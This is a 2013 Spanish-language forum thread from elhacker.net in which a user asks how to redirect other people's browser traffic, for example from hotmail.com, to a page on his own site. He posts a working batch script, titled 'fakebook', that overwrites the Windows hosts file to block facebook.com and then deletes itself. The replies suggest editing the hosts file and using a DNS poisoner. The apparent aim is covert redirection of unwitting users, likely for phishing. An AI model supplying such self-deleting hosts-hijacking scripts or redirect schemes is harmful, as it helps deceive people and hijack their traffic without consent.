elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  La función FindProxyForURL(url,host)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: La función FindProxyForURL(url,host)  (Leído 4,267 veces)
binario010101

Desconectado Desconectado

Mensajes: 136


Ver Perfil
La función FindProxyForURL(url,host)
« en: 12 Febrero 2013, 17:12 pm »

hola amigos alguien me podria explicar como crear un proxy con la funcionLa función FindProxyForURL(url,host) pac para mi pc. en internet aparece mucha imformacion pero no entiendo.


http://sparcki.blogspot.com/2009/09/configuracion-automatica-proxy-usando.html

http://translate.google.com/translate?hl=es&sl=en&tl=es&u=http%3A%2F%2Fwww.craigjconsulting.com%2Fproxypac.html

http://sparcki.blogspot.com/2010/03/archivos-de-configuracion-de-proxy.html

http://en.wikipedia.org/wiki/Proxy_auto-config

quiero un archivo que pueda usar en cualquier pc y que cuando la persona intente ej entrar a yoube.com sea redirecionada a hotmail.com

gracias
Nota. si mi pregunta esta en un foro equivocado me podrian informar gracias


« Última modificación: 13 Febrero 2013, 14:09 pm por binario010101 » En línea

binario010101@hotmail.com
no soy ing estudio sicologia
ccrunch


Desconectado Desconectado

Mensajes: 1.050



Ver Perfil WWW
Re: La función FindProxyForURL(url,host)
« Respuesta #1 en: 12 Febrero 2013, 17:44 pm »

No sé si te entiendo bien, pero para ahorrarte todo el trabajo del proxy no sería mejor modificar el archivo hosts (que se puede abrir con el bloc de notas) que está en system32?

Su modificación es muy fácil, pones la IP y el dominio asociado (o al revés, no me acuerdo muy bien).

Es algo como
**************************************
localhost 127.0.0.1
http://www.google.es 87.56.98.125 (ejemplo)
**************************************

Cuando la persona en cuestión ponga http://www.google.es en su navegador, windows lo que hace 1º es buscar entradas en el archivo hosts (de \Windows\system32) para agillizar las búsquedas.


En línea

binario010101

Desconectado Desconectado

Mensajes: 136


Ver Perfil
Re: La función FindProxyForURL(url,host)
« Respuesta #2 en: 12 Febrero 2013, 21:02 pm »

pues tu idea de modificar el host es posible pero no quiero hacer algo asi cada ves que cambie de pc. quiero tener los archivos o archivos listos para que funcione en cualquier pc. gracias
En línea

binario010101@hotmail.com
no soy ing estudio sicologia
ccrunch


Desconectado Desconectado

Mensajes: 1.050



Ver Perfil WWW
Re: La función FindProxyForURL(url,host)
« Respuesta #3 en: 12 Febrero 2013, 21:55 pm »

pues tu idea de modificar el host es posible pero no quiero hacer algo asi cada ves que cambie de pc. quiero tener los archivos o archivos listos para que funcione en cualquier pc. gracias
podrías crear un archivo bat. por ejemplo, que antes de reemplazar el archivo HOSTS, cree una copia del original, y cuando ya no lo necesites que restaure el antiguo (la copia que has hecho) o bien podrías hacerlo a mano.
En línea

binario010101

Desconectado Desconectado

Mensajes: 136


Ver Perfil
Re: La función FindProxyForURL(url,host)
« Respuesta #4 en: 12 Febrero 2013, 22:25 pm »



Código:
[color=green][/color]@echo off
title fakebook
color 2
echo.
echo # Copyright (c) 1993-1999 Microsoft Corp. > hosts.
echo # >> hosts.
echo # This is a sample HOSTS file used by Microsoft TCP/IP for Windows.>>hosts.
echo # >> hosts.
echo # This file contains the mappings of IP addresses to host names. Each >> hosts.
echo # entry should be kept on an individual line. The IP address should>> hosts.
echo # be placed in the first column followed by the corresponding host name.>> hosts.
echo # The IP address and the host name should be separated by at least one >> hosts.
echo # space.>> hosts.
echo # >> hosts.
echo # Additionally, comments (such as these) may be inserted on individual >> hosts.
echo # lines or following the machine name denoted by a '#' symbol.>> hosts.
echo # >> hosts.
echo # For example: >>hosts.
echo # >> hosts.
echo #      102.54.94.97     rhino.acme.com          # source server >>hosts.
echo #       38.25.63.10     x.acme.com              # x client host >>hosts.
echo.  >> hosts.
echo 127.0.0.1       localhost >> hosts.
echo 127.0.0.1       www.facebook.com>> hosts.
echo 127.0.0.1 facebook.com >> hosts.
echo.
echo.
move "hosts. " "C:\WINDOWS\system32\drivers\etc"
del fakebook.bat

este bat funciona bien pero tengo una duda o mejor un problema si coloco mi ip para que las personas cuando bayan a entrar al elhacker.com sean enviados a mi sitio llegan a la pagina principal de ella y quiero que llegen a un sitio determinado por ej: http://foro.elhacker.net/seguridad/nueva_encuesta_mejor_firewall-t311306.0.html quiero que la persona llege a una direcion asi y pues si uso la ip llegara al menu principal.

gracias
En línea

binario010101@hotmail.com
no soy ing estudio sicologia
ccrunch


Desconectado Desconectado

Mensajes: 1.050



Ver Perfil WWW
Re: La función FindProxyForURL(url,host)
« Respuesta #5 en: 12 Febrero 2013, 22:35 pm »

No entiendo muy bien lo último.

Por ejemplo, quieres poner 75.75.87.65 (IP de ejemplo) y que lleguen por ejemplo a un post de algún foro por ejemplo?

Entonces, cuando ponen la IP les lleva a la página principal o cómo?

No entiendo.
En línea

binario010101

Desconectado Desconectado

Mensajes: 136


Ver Perfil
Re: La función FindProxyForURL(url,host)
« Respuesta #6 en: 12 Febrero 2013, 22:43 pm »

supongamos que la ip de mi sitio es 213.33.33 si la coloco para que el navegador redirecione el trafico de hotmail.com a mi pagina pues llegarian a la ventana principal y quiero es llegen a una pagina segundario eje:  la ip de mi sitio es 213.33.33 y la direcion. pero yo quiero que las personas llegen directametne a  www.misitio.com www.misitio.com/midocumeto. gracias
En línea

binario010101@hotmail.com
no soy ing estudio sicologia
ccrunch


Desconectado Desconectado

Mensajes: 1.050



Ver Perfil WWW
Re: La función FindProxyForURL(url,host)
« Respuesta #7 en: 13 Febrero 2013, 12:39 pm »

supongamos que la ip de mi sitio es 213.33.33 si la coloco para que el navegador redirecione el trafico de hotmail.com a mi pagina pues llegarian a la ventana principal y quiero es llegen a una pagina segundario eje:  la ip de mi sitio es 213.33.33 y la direcion. pero yo quiero que las personas llegen directametne a  www.misitio.com www.misitio.com/midocumeto. gracias
pues pones www.misitio.com/midocumeto y luego la IP. la verdad es que no sé por qué te lleva a la página principal, debería llevarte a la dirección que le has puesto. Igual lo que hace es coger el index, osease la página principal del servidor y pasa de lo otro. A ver si alguien dice algo.
En línea

ccrunch


Desconectado Desconectado

Mensajes: 1.050



Ver Perfil WWW
Re: La función FindProxyForURL(url,host)
« Respuesta #8 en: 13 Febrero 2013, 12:52 pm »

Creo que ya sé cuál es el fallo. Sólo te valdrá si pones la IP. yo lo he probado en el mío aun asi no me va bien. He puesto la ip de google, y al lado la dirección de google noticias, sin embargo me lleva a la página principal de google.

Ahora que me acuerdo ese archivo sólo es para caché, para que el tiempo de búsqueda sea menor. Pero lo que tú quieres conseguir funciona seguro con un envenenador de DNS.
En línea

binario010101

Desconectado Desconectado

Mensajes: 136


Ver Perfil
Re: La función FindProxyForURL(url,host)
« Respuesta #9 en: 13 Febrero 2013, 13:45 pm »

si con el bract track 5 r 3. pero es mejor el La función FindProxyForURL(url,host) pues por lo que e leido. yo no busco tanto la funcion de ocultar la ip sino el redirecionamiento que se puede hacer con esa funcion.

pero yo no se que hacer con el archivo pac ni la configuracion del proxy pac....
En línea

binario010101@hotmail.com
no soy ing estudio sicologia
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Especificar host en ettercap ( host scan )
Hacking
Sauruxum 6 9,098 Último mensaje 11 Enero 2011, 22:58 pm
por y0g-s0th0th
Función que retorna el valor de retorno de otra función
Programación C/C++
naderST 7 4,735 Último mensaje 7 Diciembre 2011, 23:45 pm
por naderST
Error al conectar al host - no se puede abrir una conexión al host en el puerto
Hacking
AdeLax 2 15,257 Último mensaje 16 Septiembre 2012, 00:29 am
por AdeLax
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines